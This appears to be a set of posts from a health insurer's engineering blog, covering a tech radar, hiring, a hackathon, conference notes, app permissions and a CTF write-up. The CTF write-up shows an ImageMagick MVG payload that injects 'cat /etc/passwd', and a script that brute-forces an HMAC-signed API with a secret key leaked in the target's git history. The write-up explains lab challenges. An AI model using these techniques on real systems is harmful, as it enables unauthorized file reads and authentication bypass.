Introducing the ottonova Tech Radar


We have always promoted openness when it comes to our tech stack. The ottonova Tech Radar is the next step in that direction.

What is the Tech Radar?

The ottonova Tech Radar is a list of technologies. Each entry is placed into one of four rings based on an assessment outcome, called the ring assignment. The rings have the following definitions:

  • ADOPT – Technologies we have high confidence in to serve our purpose, also at large scale. Technologies with an established usage culture in our ottonova production environment, low risk, and recommended for wide use.
  • TRIAL – Technologies we have seen work successfully in project work to solve a real problem; first serious usage experiences that confirm benefits and can uncover limitations. TRIAL technologies are slightly riskier; some engineers in our organization have walked this path and will share knowledge and experience.
  • ASSESS – Technologies that are promising and have a clear potential value-add for us; technologies worth investing some research and prototyping effort in to see if they have an impact. ASSESS technologies carry higher risk; they are often brand new and largely unproven in our organization. You will find some engineers who know the technology and promote it, and you may even find teams that have started a prototyping effort.
  • HOLD – Technologies not recommended for new projects. Technologies that we think are not (yet) worth (further) investment. HOLD technologies should not be used for new projects, but can usually be continued in existing ones.

What do we use it for?

The Tech Radar is a tool to inspire and support engineering teams at ottonova to pick the best technologies for new projects. It provides a platform to share knowledge and experience in technologies, to reflect on technology decisions and continuously evolve our technology landscape.

Based on the pioneering work of ThoughtWorks, our Tech Radar sets out the changes in technologies that are interesting in software development — changes that we think our engineering teams should pay attention to and use in their projects.

When and how is the radar updated?

In general, discussions around technologies and their implementation happen everywhere across our tech departments. Once we identify that a new technology has been raised, we discuss and consolidate it in our Architecture Team.

We collect these entries and once per quarter the Architecture Team rates and assigns them to the appropriate ring definition.

Disclaimer: We used Zalando’s open source code to create our Tech Radar and were heavily influenced by their implementation. Feel free to do the same to create your own version.
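Under the hood, a radar like this is just data: each entry is a label plus a ring assignment. A minimal Python sketch (the entry names and structure here are illustrative only, not the actual format used by our radar or by Zalando's code):

```python
# Illustrative only: a radar entry is a label plus a ring assignment.
RINGS = ["ADOPT", "TRIAL", "ASSESS", "HOLD"]

entries = [
    {"label": "Symfony", "ring": "ADOPT"},
    {"label": "Go", "ring": "TRIAL"},
    {"label": "Serverless", "ring": "ASSESS"},
]

def group_by_ring(entries):
    """Group radar entry labels by their ring, in ring order."""
    grouped = {ring: [] for ring in RINGS}
    for entry in entries:
        grouped[entry["ring"]].append(entry["label"])
    return grouped

print(group_by_ring(entries)["ADOPT"])  # ['Symfony']
```

The quarterly Architecture Team review then boils down to editing this list and re-rendering the radar.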

Recruiting Backend Engineers at ottonova

Here are some words about how the Backend Team goes about finding new team members. We want to do our part and share with the community, as well as provide a bit more transparency into ottonova and how we are building state-of-the-art software that powers Germany’s first digital health insurance.

This article covers what we are doing in the Backend Team, what we value, and how we ensure we hire people that share our values.

The Backend Team

Our team is responsible for many of the services that power our health insurance solutions at ottonova. This includes our own unique functionality, like document management, appointment timelines, guided signup, as well as interconnecting industry-specific specialized applications.

Under the hood, we manage a collection of independent microservices. Most of them are written in PHP and deliver REST APIs through Symfony, while a couple leverage Node.js or Go. We keep our stack current and upgrade periodically.

As a fairly young company, we spend most of our time adding new functionality to our software in cooperation with product owners. But at the same time we invest fair efforts into continuously improving the technical quality of our services.


Technical excellence is one of our team’s core values. To this end, we are practitioners of domain-driven design (DDD). Our services are built around clearly defined domains and follow strict separation boundaries.

We can do this because we created an architecture that allows it and because we have the internal support to focus on quality. We invest a lot in keeping the bar high: whenever needed, we refactor to make sure the Domain Layer stays up to date with the business needs, and that the Infrastructure Layer stays performant enough to scale.
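As a rough illustration of that separation (a hypothetical Python sketch; our actual services are PHP/Symfony, and all names here are invented): the Domain Layer defines the interfaces it needs and stays free of persistence details, while the Infrastructure Layer implements them.

```python
from abc import ABC, abstractmethod
from dataclasses import dataclass

# --- Domain Layer: pure business objects and ports, no persistence code ---

@dataclass
class Contract:
    id: str
    monthly_premium: int  # in cents

class ContractRepository(ABC):
    """Port defined by the domain; the domain depends only on this interface."""
    @abstractmethod
    def get(self, contract_id: str) -> Contract: ...

# --- Infrastructure Layer: implements the port (here with a dict, in real
#     life with a database, an HTTP client, etc.) ---

class InMemoryContractRepository(ContractRepository):
    def __init__(self):
        self._store = {}

    def add(self, contract: Contract) -> None:
        self._store[contract.id] = contract

    def get(self, contract_id: str) -> Contract:
        return self._store[contract_id]

repo = InMemoryContractRepository()
repo.add(Contract(id="C-1", monthly_premium=19900))
print(repo.get("C-1").monthly_premium)  # 19900
```

Because the domain only knows the interface, the infrastructure implementation can be swapped without touching business rules.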

Although most of our work is done using PHP, we strongly believe in using the right tool for the job. Modern PHP happens to be a pretty good tool for describing a rich Domain. But we like to be pragmatic and where it is not good enough, maybe in terms of performance, we are free to choose something more appropriate.

Expectations from a new team member

From someone joining our team, we first of all expect the right mindset for working in a company that values quality. We are looking for colleagues who are capable, eager to learn, and happy to share their existing knowledge with the team.

A certain set of skills or the right foundation for developing those skills is needed as well. We are particularly interested in a good mastery of programming and PHP fundamentals, Web Development, REST, OOP, and Clean Code.

As actual coding is central to our work, we require and test the ability to both write code on the spot and to come up with clean design.

These expectations can be grouped into four main pillars that a candidate will be evaluated on:

  1. Mindset – able and willing to both acquire and transfer knowledge inside a team
  2. Knowledge – possesses the core knowledge needed for the languages and tools we use
  3. Clean Design – capable of employing industry standards to come up with simple solutions that can be understood by others
  4. Coding Fluency – can easily translate requirements into code; coding is a natural process

The Recruiting Process

To get to work with us, a candidate goes through a process designed to validate our main pillars. All this while giving them plenty of time to get to know us and have all their questions answered.

It starts with a short call with HR, followed by a simple home coding assignment. Next there is a quick technical screening call. If everything is successful, we finish it up with an in-person meeting where we take 1-2 hours to get to know each other better.

The Coding Assignment

Counting mostly toward the Clean Design pillar, we start our process with a coding assignment that we send to applicants. It is meant to let them show how they would normally solve a problem in their day-to-day work. It can be done at home with little time pressure: it is estimated to take a couple of hours and can be delivered within the next 10 days.

The solution to this would potentially fit into a few lines of code. But since the requirement is to treat it as a realistic assignment, we are expecting something a bit more elaborate. We are particularly interested in how well the design reflects the requirements and the usage of clean OOP and language features, the correctness of the result (including edge cases), and tests.

We value everyone’s time and we don’t want unnecessary effort invested into this. We definitely do not care about features that were not asked for, overly engineered user interfaces or formatting, or usage of design patterns just for the sake of showcasing their knowledge.

It will ideally be complex enough to reflect the requirements in code, but simple enough that anyone can understand the implementation without explanations.

The Tech Screening

To test the Knowledge pillar, we continue with a Zoom call. This step was designed for efficiency: by timeboxing it to 30 minutes, we make sure everyone has time for it, even on short notice. We don’t want to lose the interest of good candidates by getting lost in a scheduling maze.

Even though it’s short, this call gives us a considerably higher match rate for the in-person interview. Over time we found that there really are just a handful of fundamental concepts we expect a new colleague to already know. Many of the others can quickly be learned by any competent programmer.

All topics covered in this screening are objectively answerable. So at the end of a successful round we can make the invitation for the next step.

In-Person Interview

This is when we really get to know each other. This is ideally done at our office in central Munich – easier for people already close by, but equally doable for those coming from afar.

In this meeting we start by introducing ourselves to each other and sharing some information about the team and the company in general.

Next we ask about the candidate’s previous work experience. With this and the overall way our dialog progresses we want to check the Mindset pillar and ensure that the potential new colleague fits well into our team.

After that we go into a new round of “questioning” to test the Knowledge pillar more deeply. It is similar to the Tech Screening, but this time open-ended. Informed opinions are expected and valued. We definitely want to talk about REST, microservices, web security, design patterns and OOP in general, or even agile processes.

Then comes the fun part: we get to write some code. Well… mostly the candidate writes it, but we can also help. We go through a few mostly straightforward coding problems that can be solved on the spot. We are not looking for obscure PHP function knowledge, bullet-proof code, or anything ready to be released. We just want to see how a new problem is tackled and make sure that writing code comes naturally to the candidate. With this we cover the Coding Fluency pillar.

Afterwards it’s the interviewee’s turn. We take our time to answer any questions they may have. They get a chance to meet someone from another team and get a tour of the office.

What’s next?

The interviewers consult and if there is a unanimous “hire” decision, we send an offer. In any case, as soon as possible (usually a few days) we inform the candidate of the outcome.

Interested in working with us? To get started, apply here:

CTF Writeup: Capture the TI-eRx

A few days back, the gematik – the organisation responsible for the secure network infrastructure (called telematics infrastructure, or TI) of German healthcare actors – held its first CTF. The theme of the CTF was the e-prescription, which publicly insured people in Germany may now use to get their medicine without a paper prescription. As a private health insurer we are not yet part of the TI, but that will probably change in the future. So, as an interested party with high security standards, a team of three ottonova employees participated in the #ctfgematik.

We had a lot of fun during this day, even though some daily business tasks prevented us from dedicating our full time and effort to the CTF. Nonetheless, we are proud of our participation (we placed 17th out of 50 registered teams, of which 30 solved at least one challenge). We want to share our progress in the CTF here:

TI Park

One part of the CTF was held in a WorkAdventure instance. The TI Park was infected by a dinosaur sickness, and you had to get the medicine to become healthy again.

In challenge 1, we needed to figure out the phone number of our doctor from the input string:

74 69 5f 65 72 78 7b 2b 34 39 33 30 32 35 36 39 38 37 34 33 34 7d

Looking at the string, these are clearly hex-encoded bytes. So let’s try to convert them to something meaningful. Converting them to ASCII characters provided our first flag of the day: ti_erx{+4930256987434}
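For reference, the conversion is essentially a one-liner in Python:

```python
# The hex string from the challenge, decoded byte by byte to ASCII.
hex_hint = "74 69 5f 65 72 78 7b 2b 34 39 33 30 32 35 36 39 38 37 34 33 34 7d"
flag = bytes.fromhex(hex_hint.replace(" ", "")).decode("ascii")
print(flag)  # ti_erx{+4930256987434}
```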

Challenge 2 asked us for the name of our health insurance and provided the hint:


Probably an encoding issue again. This string looked suspiciously like a Base64-encoded string, and decoding it provided our second token: ti_erx{TIPK TI-Park Krankenkasse}

Now we had to figure out our e-mail address that we used with the e-prescription and got another string to work with:

01110100 01101001 01011111 01100101 01110010
01111000 01111011 01100011 01110100 01100110
01000000 01110100 01101001 01110000 01100001
01110010 01101011 00101110 01100100 01100101

Seeing that this is binary data is easy. Again, converting it to ASCII text proved successful: ti_erx{}
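The same conversion in Python, splitting on whitespace and parsing each group of bits as a base-2 byte:

```python
# The binary string from the challenge; each 8-bit group is one ASCII byte.
binary_hint = (
    "01110100 01101001 01011111 01100101 01110010 "
    "01111000 01111011 01100011 01110100 01100110 "
    "01000000 01110100 01101001 01110000 01100001 "
    "01110010 01101011 00101110 01100100 01100101"
)
decoded = "".join(chr(int(byte, 2)) for byte in binary_hint.split())
print(decoded)
```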

Now the only thing that was left was getting the correct medicine:

64 47 6c 66 5a 58 4a 34 65 32 6b 67 61 47 46 32 5a 53 42 6b 5a 57 5a 6c 59 58 52 6c 5a 43 42 6b 61 57 35 76 63 6d 6c 30 61 58 4e 39

Again some hex data? Let’s convert to ASCII again: dGlfZXJ4e2kgaGF2ZSBkZWZlYXRlZCBkaW5vcml0aXN9

Hmm… Another base64 string? Bingo! Decode it and get the last flag for this series of challenges: ti_erx{i have defeated dinoritis}
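The whole chain – hex to ASCII, then Base64 to the flag – in a few lines of Python:

```python
import base64

# The hex string from the last challenge.
hex_hint = (
    "64 47 6c 66 5a 58 4a 34 65 32 6b 67 61 47 46 32 5a 53 42 6b "
    "5a 57 5a 6c 59 58 52 6c 5a 43 42 6b 61 57 35 76 63 6d 6c 30 "
    "61 58 4e 39"
)
# First layer: hex -> ASCII yields a Base64 string...
b64_string = bytes.fromhex(hex_hint.replace(" ", "")).decode("ascii")
# ...second layer: Base64 -> the actual flag.
flag = base64.b64decode(b64_string).decode("ascii")
print(flag)  # ti_erx{i have defeated dinoritis}
```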

Android App

The next set of challenges we tackled concerned the e-prescription mobile app. As we only had Android devices at hand, we were only able to solve three of the four challenges (one of them only worked with iOS).

Challenge 1 of the app challenges asked for the contact data of a non-existent health insurance. Inside the app you can get support with fulfilling the requirements for the e-prescription, such as the electronic health card and a PIN. For this purpose, it provides contact details for several insurances. Finding the correct (non-existent) insurance was quite tiresome, as you always had to select an insurance from a drop-down menu, go to the next page, check its contact information, go back, choose the next insurance, and so on. For normal usage this is fine, but for our “hacking” attempt it meant the task took us at least 20 minutes longer than it would have otherwise. Finally (after consuming two hints), we figured out that the fea-direkt Krankenkasse is not a real insurance and were able to verify its e-mail address as the correct flag: ti_erx{}

The next task asked us to figure out which doctor had prescribed a certain medicine. We quickly found the doctor in the prescription history but struggled to get the correct flag, as the name was written differently in several places in the app. Fortunately, at some point our trial-and-error approach bore fruit and we got our next token: ti_erx{Praxis Dr. Mortuus est}

With only Android devices at hand, we had to skip challenge 3 and went straight to the last challenge in this category. There we needed to find a pharmacy that did not exist. The task description stated that we should look nearby. The location in the app seemed to be fixed to Cuxhaven, a city in the north of Germany. So we checked the pharmacies near our – supposed – location. The penguin pharmacy actually existed, but we were lucky nonetheless and found a pharmacy inside the app that had a suspicious e-mail address set. The name of this pharmacy proved to be the solution: ti_erx{Shark Apotheke}

File Upload and Imagemagick

Now we are coming to the best part. Web applications with some real vulnerabilities as they appear in the wild.

We tackled the “Insider Artist” challenge, where there was supposedly an issue with an upload form. You could upload a picture that was then resized using ImageMagick. Some developer had forgotten the debug output of ImageMagick in the website source code, so after an upload you could plainly see how ImageMagick was used and which version. A short CVE research showed how vulnerable this version was and provided some exploit ideas.

The task description hinted that the requested token could be found in the name of the last created user on the Linux server. So we created our exploit “file_read.mvg” and uploaded it to the server:

push graphic-context
viewbox 0 0 640 480
fill 'url(";cat "/etc/passwd)'
pop graphic-context

The response was quite revealing and included the following HTML comment, which held our flag:

   ---------------- START DEBUG INFORMATION ----------------
   stdout: root:x:0:0:root:/root:/bin/bash
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Version: ImageMagick 6.8.9-9 Q16 x86_64 2016-02-02
Copyright: Copyright (C) 1999-2014 ImageMagick Studio LLC
Features: DPC Modules OpenMP
Delegates: bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr ltdl lzma openexr pangocairo png tiff wmf x xml zlib

   stderr: convert: unrecognized color `";cat "/etc/passwd' @ warning/color.c/GetColorCompliance/1046.
convert: no decode delegate for this image format `HTTPS' @ error/constitute.c/ReadImage/535.
public/upload/picture.png MVG 640x480 640x480+0+0 16-bit sRGB 121B 0.000u 0:00.459
public/upload/picture.png=>/usr/src/app/public/upload/picture.png MVG 640x480=>56x42 56x42+0+0 8-bit sRGB 2c 264B 0.020u 0:00.160
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3182.

   ----------------  END DEBUG INFORMATION  ----------------

Git History and Broken Authentication

The administrator of this vulnerable web application had uploaded the .git directory onto the web server. After verifying the existence of some files in the folder (and failing miserably to reconstruct meaningful information from them manually), we simply downloaded the whole folder using the downloader from GitTools.

With the full .git folder, we browsed the git history and found a secret key that was used to compute a signature: v3ryv3rys3cr3t. We also found the HMAC algorithm used for the signature. The only unknown needed to send valid requests was a seed, a number in the range of 1 to 1000 – something that seemed fairly easy to brute-force.

So we wrote a small script that, for each possible seed, generates the correct payload for an API request, signs it, and sends it to the API.


import hmac
import hashlib
import base64
import requests

key = b"v3ryv3rys3cr3t"
user = "HELO"

for i in range(1, 1001):  # the seed is a number between 1 and 1000
    # Create the HMAC-SHA256 signature over user + seed
    h = hmac.new(key, (user + str(i)).encode('utf-8'), hashlib.sha256)
    hash = h.hexdigest()

    # Build the JSON payload and Base64-encode it
    payload = '{{"kvnr": "{}", "sig": "{}"}}'.format(user + str(i), hash)
    b = base64.b64encode(payload.encode('utf-8'))

    # Send the request (API URL omitted)
    response = requests.get("", headers={"Accept": "application/json", "X-AUTH": b})
    if response.text != "No prescription found":
        print("Random Number: ", i)

The script ran for about a minute until it hit the correct seed and gave us a valid response. Using this response, we were easily able to craft another API request regarding the medication denoted in the task. This gave us the information to construct the flag. Unfortunately, we only finished this challenge 7 minutes past the deadline and were not able to enter the flag and collect further points. What a shame… Still, this challenge was really awesome, and debating ideas and crunching on it left us with a great feeling when we finally got it working. There were so many different issues (forgotten git directory, secret in git history, signature code in git history, brute-forceable seed) in this one challenge that it was really hard, but so satisfying to work on.

A big round of applause to the gematik for organising the event. We are already looking forward to the next round!



Continuing our Hackathon tradition

ottonova Hackathon Remote Edition

At ottonova, we have taken the challenge of bringing a slowly moving and mostly antiquated business, the one of health insurance in Germany, into the 21st century. For over three years already we’ve been offering our customers not only competitive insurance tariffs, but also the digital products that go along with them. All this to make their lives better and to prove that, yes, insurance can also be easy and fun to use.

It follows naturally that all of us here are innovators at heart. And innovators like to try out new things. “We are brave” – as one of our company values says. In the last years, we have found that a good way to get our creative juices flowing is by holding internal hackathons. The events are organized by our IT department and welcome everyone in the company who has an idea or simply wants to help out. In the first two editions, almost all the engineers participated, joined by many more colleagues from other departments, working in teams. The enthusiasm before and after the event was overwhelming. Everyone was happy to quickly bring a cool new thing live, to try out new tech, or just to hack something up together with colleagues with whom they would normally not work.

After such a positive response to the previous instances, we were eagerly awaiting a new installment. What we affectionately call a Hackotton was due for its third edition this summer. It had already been half a year since the last one. Too long, some would say. We wanted our Hackotton 3.0.

But will a Hackotton be the same if, due to Covid-19, we’re not all in the office together? We have been working remotely since spring, when the social distancing measures were started. We have been doing so successfully, but this time it was not just work, it was a bit more. We did not know how an event that is mostly social in nature would end up if organized remotely. Still, we decided to give it a try.

We planned the event to take about two days. That is enough time to try out an idea, especially when you’re able to hack it together without the rigorousness of our normal style of work. It all started with a kick-off. While in the last editions this was where ideas were pitched and teams were formed, this time round it was just a very short Zoom call to mark the start. The idea gathering and team forming were replaced with a Confluence page with a join option for team members. As this was announced well in advance, there was plenty of time to think about topics and decide which teams to join. We ended up having a total of 10 teams and, for the first time, we were joined by external guests.

When the Hackottons were held in the office, all the planning and communication was done in person. There was a constant rustle on the floor, caused by people changing desks to be close to their team, or by heated discussions between team members. This time, while the office was still available for the few who chose to go there, most people worked remotely. So the close collaboration mode needed to be emulated somehow. Though some quick planning was done in the beginning to distribute tasks, in the end we relied mostly on instant messaging (Mattermost) and video calls (Zoom) to get things done.

As we have the good habit of developing only containerized applications, and have quite some practice with this, even “hacked” solutions built during the Hackotton are put into Docker containers. This allows for much easier collaboration and for building more complex systems even in hackathon mode. Especially when working remotely, it feels great when a teammate gives you an already built container that you can simply connect to the part you are implementing. As a follow-up advantage of this setup, we can quickly add these containers to AWS’s ECS in our pre-live environment, so that we can demo our ideas under realistic conditions and later, with the infrastructure already solved, have a smooth path towards a live release.

At the end of an intense second day of hacking, and after hurrying to bring our projects to a functional state and put together some sort of presentation, we had the chance to show our ideas to the whole company (over Zoom) and see what the other teams had managed to build. Everyone was given a 5-minute slot to demo and present their project and impress the audience. It is a hard task to fit all the passion the teams poured into their projects into 5 short minutes, but the moderators were understanding and allowed for more time when the mark was overstepped.

After all the teams got their turn in the spotlight and demoed their ideas, we had an online voting round to choose a winner. The laurel wreath for the 3rd Hackotton edition went, by a clear margin, to a very fruitful collaboration between the Android developers and one of our designers. They came up with a radically different approach to structuring our mobile apps. They showed how, by putting the focus on doctor appointments, interactions with our apps can be greatly simplified. Their solution takes our currently separate Timeline, Documents, and Chat sections in the apps and brings them together under Appointments. This way, related invoices, claim settlements, and doctor appointments can be reviewed in one place, and communicating with our customer support becomes easier. This will give our app users a better overview of, and control over, their interactions with healthcare providers and with us as an insurance company, and consequently make them happier with our service.

Apart from the great mobile app improvement idea, all the other teams brought convincing proposals. In this edition we got to see new tooling for our colleagues in the Sales department, improvements in document processing using OCR, optimizations to our website, internal applications for making our work easier, and even more changes for the better for our customers’ experience using our products. The response from the audience was overwhelmingly positive, and even if the event ended with the presentations and voting, discussions about the projects continued well into the next days.

As any hackathon comes with an improvement in morale and team spirit, we can already conclude that organizing them is a long-term win for the participants and the company overall. For us at ottonova, the past Hackottons happened to come with some short-term wins as well. Some of the projects ended up being used, either directly or after planning them into our roadmap. From the past events we have “Agento”, a very handy internal automation tool that we use to quickly insure children attached to a parent’s account, as well as “ottoPrint”, our own PDF generation service, which is much faster and more customizable than the off-the-shelf solution we had been using until then. So we are fairly confident that some of this edition’s projects will end up being used. The winner has already sparked the interest of the product owners.

With this third edition, organized even remotely, the Hackotton has become part of our company culture and has proven that it can endure. As we have come to know that “after the Hackotton is before the Hackotton”, we’re now eagerly waiting for the fourth one, and using the time to come up with cool new ideas.

The rest of the PHP engineers at ottonova and I had the pleasure of attending the PHP.Barcelona conference in November this year. It was a great experience, spanning two full days.

I’ve put together some quick and biased notes about the presentations. Here it goes…


Day 1

Opening Keynote – Rasmus Lerdorf

A really uplifting beginning of the conference, with Rasmus going down memory lane. We got to know some of the motivation behind and the process of creating PHP. All this further strengthened my opinion that it didn’t really start as a serious programming language. (Ok. I admit. It did progress since then, so don’t start throwing stones.)

A funny highlight was the explanation that “PHP is vertically consistent” – the PHP functions match the vendor functions they create an API for. Of course, this leaves it inconsistent with itself.

Also really enlightening was the clarification of why adding things like further type checking, generics, or class modifiers like “immutable” would mean a serious performance hit for the language – so we should really stop hoping that any of that will come soon.

From Helpers to Middleware – Marco Pivetta

A nice, practical presentation. It showed how a design can incrementally evolve from what would basically be spaghetti code into a proper modular and scalable middleware-style architecture. While a good start, I would have hoped for a deeper dive into this style, because where it stopped, it felt like it had just scratched the surface.

Microservices gone wrong – Anthony Ferrara

Although this was just a public retrospective of a specific project, which maybe will not resonate with everyone, for me and the work we do at ottonova, there were still a couple of valuable lessons to take home:

  • Messages that microservices use to synchronize can be differentiated into proper Events and RPCs, and these categories can and maybe should be treated differently. The latter require a response back, while the former don’t really need it. We don’t have this clear separation ourselves yet, but the need for it is definitely starting to show.
  • Each entity in your domain does not need to have its own service. Larger services are also fine, if they make sense for your use case. Our own setup is using domain-defined microservices, of various sizes, so seeing that splitting everything aggressively may backfire will make us think twice when extracting a new microservice.

He has a cute dog.

Serverless PHP applications with Bref – Matthieu Napoli

I guess it’s nice to see that there is a way to hook up PHP to Lambda, but then again, why take the effort to force it instead of just using a directly supported language? Apart from that aspect, it was interesting to get an intro to AWS Lambda, since I hadn’t tried it out myself yet.

JSON Web Tokens – Sam Bellen

Not that much to say here: JWTs. We already use them, you should use them too. They’re easy to work with and really useful. At their core they are just signed information in a nice and standard JSON format. Nevertheless still a very powerful concept as it enables you to transfer claims securely from one party to another.
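To make the “just signed information” point concrete, here is a minimal HS256 sketch in Python (illustrative only; in real code use a vetted library such as PyJWT):

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # Base64url without padding, as JWTs use (RFC 7515 encoding)
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def make_jwt(payload: dict, secret: bytes) -> str:
    # A JWT is: base64url(header).base64url(payload).base64url(signature)
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    signing_input = f"{header}.{body}".encode()
    signature = b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())
    return f"{header}.{body}.{signature}"

token = make_jwt({"sub": "user-42"}, b"not-a-real-secret")
print(token.count("."))  # 2 -> header.payload.signature
```

The receiving party recomputes the HMAC over the first two segments and compares; any tampering with the claims breaks the signature.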

Developing cacheable PHP applications – Thijs Feryn

Well, this one was awkward, especially since I had the pleasure of sitting through this exact presentation some months before. Thijs is a dedicated evangelist, you have to give him that. He manages to squeeze everything out of what Varnish can do and serve it to his audience on a silver platter.

Now come the buts. The use cases considered in the presentation are outdated, focusing far too much on server-side rendering and templating. And I particularly did not enjoy him instructing an auditorium full of developers (some maybe more impressionable than others) to use their caching layer for keeping application logic.

Nothing wrong with Varnish itself, though. And since we need to keep all our data inside Germany for legal reasons, maybe we’ll need to consider an on-premises caching solution ourselves in the future.

PHP Performance Trivia – Nikita Popov

Really confident presentation from one of the core PHP contributors, containing a deeper dive into how the OPcache works, and what its limitations are. Not that serious limitations, if you ask me. With a bit of care for how you handle deployments, you should be fine.

Also interesting to see some benchmarks that show that using objects instead of arrays is much more memory-efficient in PHP. Not that the opposite would have made us drop using Value Objects, but still good to see that we’re already using the memory friendly option.

Get GOing with a new language – Kat Zień

While there was nothing spectacular about this presentation, just an intro into Go, I still enjoyed seeing that there is a clear interest from the PHP community to explore other languages. Go is particularly relevant for us at ottonova, since we’re already using it for our messaging setup and we plan to try some more areas where we think it would do a better job than good old PHP.

Day 2

Advanced Web Application Architecture – Matthias Noback

Nicely structured first dive into DDD and the rationale behind it. We’re already doing most of what this presentation talks about, and much more, at ottonova, but it helps to see someone else’s take on it and double-check our approach.

It was reassuring to see that one of the first requirements of DDD is to separate your Domain from your Infrastructure, a thing that we carefully follow, along with some more advanced techniques.
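As a toy sketch of that separation (all names here are hypothetical, and Python stands in for PHP): the domain layer depends only on an abstract repository, while the concrete storage adapter lives in the infrastructure layer and can be swapped without touching business logic.

```python
from dataclasses import dataclass
from typing import Protocol

# --- Domain layer: pure business code, no framework or storage imports ---

@dataclass
class Contract:
    id: str
    monthly_premium_cents: int

class ContractRepository(Protocol):
    # the domain depends only on this abstraction
    def get(self, contract_id: str) -> Contract: ...

def yearly_premium_cents(repo: ContractRepository, contract_id: str) -> int:
    # domain logic talks to the interface, never to a concrete database
    return repo.get(contract_id).monthly_premium_cents * 12

# --- Infrastructure layer: one concrete adapter (in-memory here; SQL in real life) ---

class InMemoryContractRepository:
    def __init__(self, contracts: dict):
        self._contracts = contracts

    def get(self, contract_id: str) -> Contract:
        return self._contracts[contract_id]

repo = InMemoryContractRepository({"c-1": Contract("c-1", 19900)})
print(yearly_premium_cents(repo, "c-1"))  # 238800
```

The in-memory adapter doubles as a test double, which is one of the practical payoffs of keeping the domain free of infrastructure concerns.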

I also really appreciated the general advice that not every project is the same: if something applies somewhere, it does not automatically mean it will apply to your situation. This is, of course, common sense, but it doesn’t hurt to hear some basic common sense from time to time, in a world overflowing with strong opinions.

Working with Webhooks – Lorna Mitchell

A decently structured presentation about webhooks, an architectural style for async communication. Nothing groundbreaking here, but since this style is not commonly used (or at least not by me), it’s nice to be reminded it exists. Good tip about using ngrok to expose local endpoints.

Supercharge your apps with ReactPHP & PHP-PM – Albert Casademont

Since FPM is already showing its scaling limitations for us, it was particularly interesting to see what other options would be available.

For many of the requests we process, there is a common pattern: we get some input, process it, pass it to another (possibly external) service, and wait for a response. Then we do some more work on it and respond to our client. This implies considerable processing power wasted on our side: we spend a lot of time waiting for HTTP responses ourselves. This is where some concurrent PHP would come in handy: while one request is waiting, other requests can be handled. So we will definitely be looking into either PHP-PM or Swoole in the future.
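The event-loop idea behind ReactPHP, PHP-PM and Swoole is easy to sketch. Here it is in Python’s asyncio (purely illustrative, not the PHP tooling itself): three “requests”, each waiting 0.2s on a simulated upstream service, finish in roughly 0.2s total instead of 0.6s, because the loop handles other requests while one is waiting.

```python
import asyncio
import time

async def handle_request(name: str, upstream_delay: float) -> str:
    # simulate waiting on an external HTTP service; an FPM worker would be
    # blocked here, but an event loop simply switches to another task
    await asyncio.sleep(upstream_delay)
    return f"{name}: done"

async def main() -> float:
    start = time.perf_counter()
    # three "requests", each waiting 0.2s on an upstream service,
    # are handled concurrently on a single thread
    results = await asyncio.gather(
        handle_request("req-1", 0.2),
        handle_request("req-2", 0.2),
        handle_request("req-3", 0.2),
    )
    elapsed = time.perf_counter() - start
    print(results, f"in {elapsed:.2f}s")  # roughly 0.2s, not 0.6s
    return elapsed

elapsed = asyncio.run(main())
```

The gain comes purely from overlapping I/O waits; CPU-bound work would not benefit from this model.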

It’s all about the goto – Derick Rethans

This was a nice, theoretical dive into how PHP parses and executes code. For someone with even a minimal Computer Science background, though, I think it was still fairly basic, and I don’t think there was much to take away.

Develop microservices in PHP – Enrico Zimuel

This was an interesting walk-through of some of the benefits, and specific concerns, of using microservices. Nothing too new for us, since we already rely heavily on microservices, both in the PHP group and in our other teams.

One thing we noted down to improve was the standardisation of error responses. Good hint. We’ll definitely look into that one.

Mutation Testing – Better code by making bugs – Théo Fidry

Mutation testing seems really cool as a theoretical concept, and it’s nice to see that someone is trying it out, though I’m not sure how it would work out in practice. So far, I can see two major downsides. First, it simply takes a lot of time to run such a test suite; even with optimisations, this could take hours. Second, the testing itself is only as good as your mutators, and I think writing relevant mutators is not a trivial task. Having some that just replace operators would be straightforward, but how much does that help?

Back to Munich

The rest we sadly had to skip, so as not to miss our plane back home.

Overall, as we hoped when booking the tickets, the lineup was a solid one. And they delivered. Kudos to them, as well as to the organizers. We came back with lots of new ideas, some that we will try in the near future, and confirmation that we are on the right track with many of our architectural decisions.

We will definitely have Barcelona on our list for next year as well. Lovely city too.

Our Android App’s Permissions Explained


ottonova services GmbH

Starting with Android 6 (Marshmallow), Android has been improving and reshaping permissions, giving users more control and a better overview of what apps do with them. App permissions are moving in the direction of more transparency and security.

Still, it’s not always easy to understand why some permissions are needed. We at ottonova would like to clarify why we request certain permissions and what we use them for.

Permissions overview

The purpose of a permission is to protect the privacy of an Android user. Android apps must request permission to access sensitive user data (such as contacts and SMS), as well as certain system features (such as camera and internet). Depending on the feature, the system might grant the permission automatically or might prompt the user to approve the request.

Permissions are used to request system functionalities. Some permissions require user approval and some don’t, depending on the permission’s protection level.
There are four protection levels: Normal, Signature, Dangerous, and Special.
Additionally, an app can declare custom permissions to protect access to its own services; other apps (or the app itself) must then request these custom permissions to use those services.

Protection levels

Level | Needs user approval? | Description | Example
Normal | No | Provides access to data or resources outside the app sandbox; does not incur any risk to private data or other apps’ operations. | WiFi state, internet, Bluetooth, etc.
Signature | No | Granted at install time; apps that require these permissions need to be signed with the same certificate as the app that defines the permission. | Battery stats, carrier services, etc.
Dangerous | Yes | Can provide access to sensitive data or resources, or could potentially affect the user’s stored data or other apps’ operations. The user must explicitly authorize these permissions before the app can use any functionality that depends on them. | Read contacts, camera, capture audio, etc.
Special / Privileged | Yes | Similar to dangerous permissions, but authorization is managed by the Android operating system; apps should try to avoid using these permissions. | Write settings, system alert windows, etc.

What permissions do we use?

ottonova services GmbH


Permission name: android.permission.CAMERA
Protection level: dangerous

One of the core features of the ottonova app is that you can quickly scan an invoice or another document and upload it to us. We could use the native camera and not request this permission, but then users would lose the features of our in-app camera, which gives them automatic boundary/edge detection of documents and editing functions like cropping and rotating.

Permission name: android.permission.FLASHLIGHT
Protection level: Normal

Used to turn the phone’s flashlight on or off when users scan a document.


